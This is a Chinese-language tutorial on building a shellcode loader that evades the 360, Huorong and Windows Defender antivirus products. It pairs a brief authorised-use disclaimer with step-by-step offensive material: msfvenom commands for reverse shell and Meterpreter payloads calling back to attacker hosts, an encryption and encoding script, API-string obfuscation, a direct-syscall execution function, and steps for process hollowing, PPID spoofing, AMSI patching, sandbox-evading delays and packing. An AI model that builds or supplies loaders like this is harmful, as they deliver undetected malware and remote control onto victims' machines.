Shellcode免杀实战：对抗360、火绒与Defender的三重防御体系

1. 项目概述：理解“免杀”的本质与三重防御的挑战

最近在和一些做安全研究的朋友交流时，大家普遍提到一个痛点：自己写的工具或者一些用于测试的Payload，在目标机器上还没跑起来，就被360、火绒和Windows Defender这三座大山给联手“拍死”了。这确实是个很现实的问题，无论是做渗透测试、红队演练，还是进行安全产品的能力验证，绕过主流杀软的检测都是必须面对的课题。今天，我们就来深入聊聊如何针对Shellcode实现免杀，突破这三重防御。

首先，我们得明确一点，这里讨论的“免杀”技术，完全是在合法授权和安全研究的范畴内进行的。它的核心价值在于帮助安全从业者理解攻击者的对抗手法，从而更好地构建防御体系、测试安全产品的检测能力。任何技术都是一把双刃剑，关键在于使用者的意图。

那么，为什么是Shellcode？Shellcode本质是一段直接操作CPU、执行特定功能的机器码。它不依赖特定的文件格式（如PE），因此具有极高的灵活性，是许多高级攻击载荷（如Meterpreter、Cobalt Strike Beacon）的核心。也正因为这种“无文件”或“内存执行”的特性，它成为了对抗静态文件扫描的利器，但同时也面临着行为检测和内存扫描的严峻挑战。

我们面对的三位“守门员”各有特点：

• Windows Defender (Microsoft Defender Antivirus)：作为系统内置的杀软，它深度集成于Windows内核，拥有AMSI（反恶意软件扫描接口）、云查杀和强大的行为监控能力。它的静态查杀引擎对已知特征非常敏感，但有时对“白加黑”或复杂混淆的样本反应稍慢。
• 360安全卫士：国内市场的霸主，以其“云主防”和“多引擎”著称。它不仅有本地QVM启发式引擎和鲲鹏引擎，还能瞬间联动云端海量黑白名单和AI模型。它的防御是立体的，从文件落地、进程启动到网络行为，层层设卡。很多新手写的简单Shellcode加载器，在360面前几乎就是“裸奔”。
• 火绒安全：以“安静”、“轻量”和“主防强”出名。火绒的静态查杀可能不如前两者激进，但其“行为沙盒”和“恶意行为监控”非常厉害。它不依赖庞大的特征库，而是专注于分析程序的关键行为序列，比如申请可执行内存、修改自身代码、进行敏感API调用等。一个程序哪怕看起来再“干净”，只要行为可疑，火绒就可能拦截。

所以，我们的目标不是制造一个“万能”的免杀工具，而是理解它们的检测原理，并针对性地设计我们的Shellcode加载器。这更像是一场“猫鼠游戏”，我们需要不断变换思路和手法。下面，我将从设计思路、关键技术、实操实现到问题排查，完整地拆解这个过程。

2. 核心思路与对抗策略拆解

要实现有效的免杀，不能盲目地尝试各种加密编码工具，而必须有清晰的策略。我们的对抗是分层次的，对应杀软的不同检测阶段。

2.1 对抗静态特征扫描

这是第一道关卡。杀软会扫描磁盘上的文件，匹配已知的恶意软件特征码（Signature）。对于Shellcode加载器，特征可能存在于：

1. 硬编码的Shellcode字节序列：这是最明显的特征。
2. 用于解码/解密的函数代码模式：例如，一个简单的XOR循环，其汇编指令序列可能被识别。
3. 敏感的API函数名称字符串：如VirtualAlloc,CreateThread,WriteProcessMemory等，如果以明文字符串形式存在，很容易被标记。
4. 编译器的默认行为：某些编译器生成的代码段、导入表结构具有固定模式。

我们的策略：

• 加密/编码Shellcode：这是基础。不仅要对Shellcode本身进行AES、RC4或简单的异或加密，最好对加密后的数据再进行一次Base64或Hex编码，使其在静态文件中呈现为一段“无害”的字符串或字节数组。
• 字符串混淆：将所有敏感的API函数名、调试信息字符串进行混淆。例如，将"VirtualAlloc"拆分成多个片段，在运行时拼接，或者使用简单的运算在内存中还原。
• 代码混淆与花指令：在关键函数中插入大量无意义的汇编指令（花指令），或者使用控制流扁平化、不透明谓词等技术，打乱代码的逻辑结构，增加逆向分析和特征提取的难度。
• 使用Syscall直接调用：终极的字符串隐藏方案。不通过kernel32.dll的导出函数，而是直接通过系统调用号（SSN）调用底层NTAPI（如NtAllocateVirtualMemory）。这样，导入表中就不会出现敏感函数名。

2.2 对抗动态行为检测（主防）

文件过了静态扫描，运行起来才是真正的考验。主防会监控进程的运行时行为。

1. 内存操作序列：连续调用VirtualAlloc(申请内存) ->WriteProcessMemory(写入数据) ->CreateThread(创建线程执行) 或VirtualProtect(修改内存为可执行) -> 跳转执行。这是一个非常经典的Shellcode加载模式。
2. 敏感API调用：除了上述API，还有OpenProcess,CreateRemoteThread,QueueUserAPC等进程注入相关API。
3. 内存属性修改：将内存页从PAGE_READWRITE改为PAGE_EXECUTE_READ，这是“自修改代码”的典型行为。
4. 父进程-子进程关系异常：例如，一个notepad.exe进程突然去申请可执行内存并创建远程线程，就非常可疑。

我们的策略：

• 拆分与延时：不要将“申请-写入-执行”这三个动作紧凑地连续完成。可以在程序启动时申请内存，过一段时间（或等待某个事件）再写入Shellcode，再等待更久才去执行。打乱行为的时间序列。
• API调用链伪装：
  • 间接调用：通过动态获取函数地址（GetProcAddress）来调用API，而不是直接链接。
  • 使用非常规API：例如，用HeapAlloc代替VirtualAlloc申请内存（虽然通常不可执行，但可结合其他技巧）。或者使用NtMapViewOfSection等更底层的函数。
  • ** unhook 与直接Syscall**：许多杀软会通过挂钩（Hook）用户层的API函数（如NtCreateThreadEx）来监控行为。我们可以尝试恢复（unhook）这些钩子，或者绕过它们直接进行系统调用（Syscall），让监控失效。
• 进程注入与伪装：
  • 进程镂空（Process Hollowing）：创建一个合法进程（如svchost.exe）并挂起，将其主模块内存“镂空”替换为我们的Shellcode，再恢复执行。从外部看，这是一个合法进程。
  • DLL劫持/搜索顺序劫持：将恶意代码放在一个合法DLL中，利用应用程序加载DLL的搜索顺序，使其加载我们的DLL并执行。
  • 父进程欺骗（PPID Spoofing）：让我们创建的进程看起来是由explorer.exe或services.exe等可信父进程创建的，而非我们的恶意程序。
• 内存保护技巧：
  • 先申请PAGE_READWRITE内存，写入Shellcode，然后调用VirtualProtect改为PAGE_EXECUTE_READ。这比直接申请PAGE_EXECUTE_READWRITE更隐蔽一些。
  • 使用VirtualAlloc和VirtualProtect的“占位”和“替换”技巧，或者利用NtCreateSection+NtMapViewOfSection来创建可执行内存区域。

2.3 对抗内存扫描与AMSI

当进程运行起来后，杀软（尤其是Defender）还会进行内存扫描。AMSI则专门针对脚本（PowerShell, VBS等）和.NET程序进行扫描。

我们的策略：

• 反射式DLL加载（Reflective DLL Injection）：不通过LoadLibrary将DLL写入磁盘并加载，而是将DLL文件本身作为数据，在内存中自主完成重定位、导入表解析等加载过程。这样，磁盘上没有DLL文件，进程模块列表中也没有这个DLL，传统内存扫描难以发现。
• 内存加密：仅在执行时解密Shellcode，执行完毕后立即重新加密或销毁。这可以对抗周期性的内存扫描。
• 规避AMSI：对于PowerShell加载器，需要先 patch 或禁用AMSI。常见方法是在脚本开头强制将amsiContext或相关函数标记为失败，或者通过反射加载未签名的.NET程序集来绕过AMSI的扫描。
• 使用合法进程的内存空间：通过进程注入技术将Shellcode写入notepad.exe,msiexec.exe等白名单进程，在其内存上下文中执行。杀软对这些进程的行为监控可能相对宽松。

重要提示：没有任何一种方法是永久的“银弹”。杀软厂商也在持续更新其检测逻辑。今天有效的方法，明天可能就会被加入特征库或行为规则。免杀是一个持续对抗的过程，核心在于思路的灵活组合与创新。

3. 关键技术点深度解析与工具选型

有了策略，我们需要具体的“武器”来实现。下面解析几个关键的技术点，并讨论常见的工具和库。

3.1 Shellcode的生成与加密

Shellcode本身需要足够稳定和通用。我们通常使用Metasploit的msfvenom或Cobalt Strike的Payload Generator来生成。

# 示例：生成一个反向TCP连接的Shellcode (x64)，输出为C语言数组格式 msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f c -b '\x00\x0a\x0d'

生成后，我们必须对其进行加密。一个简单而有效的双层处理流程是：

1. 使用对称加密算法（如AES-256-CBC）加密原始Shellcode。需要一个密钥和IV（初始化向量）。
2. 将加密后的字节数组进行Base64编码。这样，最终嵌入到加载器中的是一段看似普通的Base64字符串，静态分析时看不到任何有意义的机器码。

在加载器中，我们需要实现对应的Base64解码和AES解密函数。这里有一个技巧：不要使用知名的密码学库（如OpenSSL），因为其函数调用模式可能被检测。可以自己实现一个简单的AES算法，或者使用一个冷门的、代码经过混淆的微型加密库。

3.2 加载器编写：C/C++ vs Go vs Rust

选择什么语言写加载器，各有优劣：

• C/C++：
  • 优势：最接近系统底层，控制力最强，可以直接内联汇编，方便实现Syscall、花指令等高级技巧。编译后的体积可以做到非常小。
  • 劣势：需要自己处理很多细节（如字符串混淆、导入表处理），对开发者要求高。一些编译选项和代码模式容易被特征识别。
• Go：
  • 优势：静态编译，单个可执行文件包含所有依赖，部署简单。Go编译的二进制文件具有独特的运行时结构和线程模型，过去一段时间能绕过一些基于传统PE结构的检测。内置的crypto库方便实现加密。
  • 劣势：体积庞大（即使空程序也有~1-2MB）。其运行时初始化过程、垃圾回收机制等行为模式正逐渐被安全厂商分析并加入检测规则（例如，一个Go程序突然申请可执行内存并跳转，就很扎眼）。
• Rust：
  • 优势：同样可以静态编译，没有运行时负担，体积比Go小。内存安全特性减少了低级错误。通过winapi或windowscrate可以方便地调用Windows API。
  • 劣势：生态相对较新，一些底层技巧的实现资料不如C/C++丰富。编译后的代码模式也正在被安全研究。

我的建议是：对于追求极致隐匿和控制的场景，C/C++仍是首选。对于需要快速原型验证或利用语言特性进行初步绕过的场景，可以尝试Go或Rust。但务必记住，语言本身不是免杀的关键，代码的具体实现和行为才是。

3.3 Syscall与直接系统调用

这是绕过用户层Hook的高级技术。原理是绕过kernel32.dll或ntdll.dll中的函数实现，直接通过syscall指令调用内核服务。

实现步骤：

1. 获取SSN（System Service Number）：在运行时，从本机ntdll.dll的内存映像中，解析目标函数（如NtAllocateVirtualMemory）的Syscall号。这样避免了硬编码SSN（因为SSN随Windows版本变化）。
2. 准备参数：按照x64调用约定（前四个参数放入RCX, RDX, R8, R9，其余入栈），将参数准备好。
3. 执行Syscall：将SSN放入EAX，然后执行syscall指令。

示例（概念性汇编）：

mov r10, rcx ; Syscall调用约定要求将第一个参数移到r10 mov eax, [ssn] ; 将获取到的NtAllocateVirtualMemory的SSN放入eax syscall ret

在C/C++中，我们需要编写汇编代码块或者使用编译器内在函数（intrinsics）来执行syscall指令。使用Syscall后，用户层的API监控（如火绒、360的Hook）在很大程度上就失效了，因为调用根本没有经过被Hook的函数。

实操心得：直接使用Syscall非常有效，但实现起来复杂，且不同Windows版本需要适配。可以使用一些开源项目如SysWhispers或Hell‘s Gate来帮助生成SSN和调用模板。但请注意，这些知名项目本身也可能被检测，需要对其代码进行一定的修改和混淆。

3.4 进程注入技术的选择

将Shellcode注入到另一个进程是隐蔽执行的关键。

• 经典远程线程注入（CreateRemoteThread）：最经典，但也最容易被检测。主防几乎100%会监控CreateRemoteThread的跨进程调用。
• QueueUserAPC注入：利用异步过程调用（APC）将代码注入到目标线程的队列中。当线程进入“可警告的”等待状态时，会执行我们的代码。比远程线程稍隐蔽，但针对QueueUserAPC的检测也很多。
• 进程镂空（Process Hollowing）：隐蔽性较好。难点在于需要完美地重建注入进程的环境（如PEB、线程上下文），否则容易崩溃或被检测到异常。
• DLL反射注入（Reflective DLL Injection）：如前所述，这是内存执行技术的典范，没有磁盘文件，没有模块列表。Donut是一个优秀的工具，它可以将整个PE文件（EXE/DLL）转换成位置无关的Shellcode，从而实现内存加载。我们可以用Donut将我们的Shellcode加载器本身封装成一段新的Shellcode，再进行注入，实现“套娃”。

在当前环境下，我倾向于组合使用：

1. 使用进程镂空或父进程欺骗+进程创建启动一个“干净”的宿主进程（如rundll32.exe）。
2. 在该进程内部，使用反射式DLL注入技术，将包含核心逻辑的“DLL”加载到内存中执行。
3. 这个“DLL”内部，使用直接Syscall来执行最终的内存分配和Shellcode执行。

这样形成了一个多层、多技术的链条，大大增加了检测难度。

4. 实战构建：一个多层免杀加载器的实现步骤

让我们来规划一个具体的实现方案，它融合了上述的多个策略。我们将使用C++编写一个加载器。

4.1 第一阶段：Shellcode处理与加载器框架

1. 生成并加密Shellcode：

   # 使用msfvenom生成raw格式的Shellcode msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f raw -o payload.bin # 使用一个简单的Python脚本进行AES加密和Base64编码 # encrypt.py from Crypto.Cipher import AES from Crypto.Util.Padding import pad import base64 import os key = os.urandom(32) # AES-256 iv = os.urandom(16) cipher = AES.new(key, AES.MODE_CBC, iv) with open('payload.bin', 'rb') as f: raw_sc = f.read() encrypted = cipher.encrypt(pad(raw_sc, AES.block_size)) b64_sc = base64.b64encode(encrypted).decode('utf-8') # 将b64_sc, key, iv 输出为C++数组格式 print('// 将以下内容复制到加载器中') print('const char* b64_payload = \"' + b64_sc + '\";') print('unsigned char key[] = { ' + ', '.join(f'0x{b:02x}' for b in key) + ' };') print('unsigned char iv[] = { ' + ', '.join(f'0x{b:02x}' for b in iv) + ' };')

2. 创建Visual Studio项目：配置为Release模式，关闭调试信息（/DEBUG:NONE），开启优化（/O2），使用MT运行时库（静态链接）以减少依赖。关闭SDL检查和安全开发生命周期检查。

3. 实现Base64解码和AES解密：在网上找一个简洁的、无外部依赖的Base64解码和AES-256-CBC解密代码，集成到项目中。避免使用#pragma comment(lib, "crypt32.lib")这样明显的链接语句。

4.2 第二阶段：核心加载逻辑与混淆

1. 字符串混淆：定义一个宏或函数，用来隐藏API函数名。

   // 简单的异或混淆 char s_VirtualAlloc[] = { 'V','i'^0x55,'r','t'^0x55,'u','a'^0x55,'l','A'^0x55,'l','l'^0x55,'o','c'^0x55, 0 }; for(int i=0; i<strlen(s_VirtualAlloc); i++) s_VirtualAlloc[i] ^= 0x55; // 运行时解密 HMODULE hKernel32 = GetModuleHandleA("kernel32.dll"); auto pVirtualAlloc = (LPVOID(WINAPI*)(LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(hKernel32, s_VirtualAlloc);

2. 实现Syscall加载（可选但推荐）：集成SysWhispers，生成NtAllocateVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx等函数的直接调用代码。这将是我们最终执行Shellcode的核心手段。

3. 编写Shellcode执行函数：

   BOOL ExecuteShellcode(unsigned char* decrypted_sc, SIZE_T sc_size) { // 使用Syscall或混淆后的API指针 NTSTATUS status; PVOID baseAddr = NULL; SIZE_T regionSize = sc_size; // 1. 申请内存 (使用NtAllocateVirtualMemory Syscall) status = NtAllocateVirtualMemory(GetCurrentProcess(), &baseAddr, 0, ®ionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (status != 0) return FALSE; // 2. 写入Shellcode memcpy(baseAddr, decrypted_sc, sc_size); // 3. 修改内存为可执行 (使用NtProtectVirtualMemory Syscall) DWORD oldProtect; status = NtProtectVirtualMemory(GetCurrentProcess(), &baseAddr, ®ionSize, PAGE_EXECUTE_READ, &oldProtect); if (status != 0) { VirtualFree(baseAddr, 0, MEM_RELEASE); return FALSE; } // 4. 执行 (使用NtCreateThreadEx Syscall或CreateThread) HANDLE hThread = NULL; status = NtCreateThreadEx(&hThread, GENERIC_ALL, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)baseAddr, NULL, FALSE, 0, 0, 0, NULL); if (status != 0) return FALSE; WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); // 可选：执行后释放内存 // VirtualFree(baseAddr, 0, MEM_RELEASE); return TRUE; }

4. 插入花指令和垃圾代码：在关键函数前后，插入一些永不执行或执行无影响的汇编代码块，干扰反汇编器和特征识别。

   __asm { push eax mov eax, 0xdeadbeef pop eax nop nop nop }

4.3 第三阶段：进程注入与行为伪装

1. 实现进程镂空：

   • 使用CreateProcess创建目标进程（如C:\\Windows\\System32\\rundll32.exe），并设置CREATE_SUSPENDED标志。
   • 使用NtUnmapViewOfSection或ZwUnmapViewOfSection卸载目标进程的主模块内存。
   • 在我们自己的进程空间，按照目标进程的PEB中的ImageBase地址，使用VirtualAllocEx申请内存。
   • 将我们的Shellcode加载器（或Donut生成的PE转Shellcode）写入该内存。
   • 通过SetThreadContext修改挂起线程的上下文（主要是RIP/EIP寄存器），指向我们写入的代码入口。
   • 使用ResumeThread恢复线程执行。

2. 加入延时和随机操作：在主函数中，不要立即执行核心逻辑。可以加入Sleep(rand() % 30000 + 10000)随机睡眠10-40秒。或者循环检测某个文件是否存在、某个网络是否连通，作为触发条件。这能有效绕过一些简单的沙箱或行为监控的时间阈值检测。

3. 清理痕迹：执行完成后，可以尝试删除自身文件（自删除），但这在Windows Defender受控文件夹访问等机制下可能失败，需谨慎。

4.4 编译与后处理

1. 编译选项优化：

   • 链接器 -> 高级 -> 随机基址 (/DYNAMICBASE:YES)
   • 链接器 -> 高级 -> 数据执行保护 (DEP) -> 否 (/NXCOMPAT:NO)（注意：这可能会触发一些安全策略，需权衡）
   • 链接器 -> 高级 -> 强制完整性检查 -> 否 (/INTEGRITYCHECK:NO)
   • 链接器 -> 清单文件 -> 生成清单 -> 否
   • C/C++ -> 代码生成 -> 安全检查 -> 禁用安全检查 (/GS-)

2. 加壳与混淆：使用商业或开源的加壳工具对生成的EXE进行保护，如VMProtect, Themida（商业），或开源的UPX（但UPX特征明显，需修改版本信息或手动加壳）。加壳可以进一步隐藏原始代码结构和字符串。但请注意，一些猛壳本身就会被杀软标记为恶意，需要测试。

3. 签名（可选，高级）：如果条件允许，使用有效的代码签名证书对可执行文件进行签名，可以极大降低被拦截的概率。但这涉及法律和成本，仅供学术讨论。

5. 测试、排查与对抗升级

完成编译后，千万不要直接在主力机上测试。务必在隔离的虚拟机环境中进行。

5.1 测试环境搭建

1. 虚拟机快照：准备一个干净的Windows 10/11虚拟机，安装好360、火绒和开启实时保护的Windows Defender。务必在测试前创建快照，方便回滚。
2. 断网测试：首次测试建议断网，以测试本地引擎的检测能力。之后联网测试云查杀。
3. 行为监控工具：使用Process Monitor, Process Hacker, API Monitor等工具监控你的加载器进程的所有操作，看其行为序列是否与预期一致，有无可疑调用。

5.2 典型问题与排查

5.3 持续对抗与思路演进

当你的加载器在某一天失效时，意味着防御方升级了。你需要：

1. 分析原因：是被新的静态特征命中，还是行为规则被更新？可以尝试将样本上传到VirusTotal等平台，查看各家杀软的报毒名，从中获取线索（如Trojan.Generic,Behavior:Win32/Injector等）。
2. 调整策略：
   • 换壳：使用不同的加壳工具或自定义壳。
   • 改行为：换一种进程注入技术，或者改变API的调用顺序和时机。
   • 升级技术：研究更新的绕过技术，如利用Windows未公开的特性、合法的 LOLBins（Living Off the Land Binaries）来执行代码。
   • 模拟正常软件：让你的加载器在前期执行一些正常软件都会有的行为，如读取配置文件、访问注册表、进行一些无关的网络请求等，然后再在后台悄悄执行恶意逻辑。

最后，我必须再次强调，所有这些技术都应当用于授权的安全测试、产品评估和学术研究。理解和掌握攻击技术，是为了能更好地进行防御。安全是一个动态博弈的领域，唯有保持学习、深入原理，才能跟上变化的节奏。在实际操作中，耐心和细致的调试远比追求“一招鲜”更重要。每一个成功的免杀样本背后，都是对系统机制和安防软件逻辑的深刻理解与无数次测试调整的结果。